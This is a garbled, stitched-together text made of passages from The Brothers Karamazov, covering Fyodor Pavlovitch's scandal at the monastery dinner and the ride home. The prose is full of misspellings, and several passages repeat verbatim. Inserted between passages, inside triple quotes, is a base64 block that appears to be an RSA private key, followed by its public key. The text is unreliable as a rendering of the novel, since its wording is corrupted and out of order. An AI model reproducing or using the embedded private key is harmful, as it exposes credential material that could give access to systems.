Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
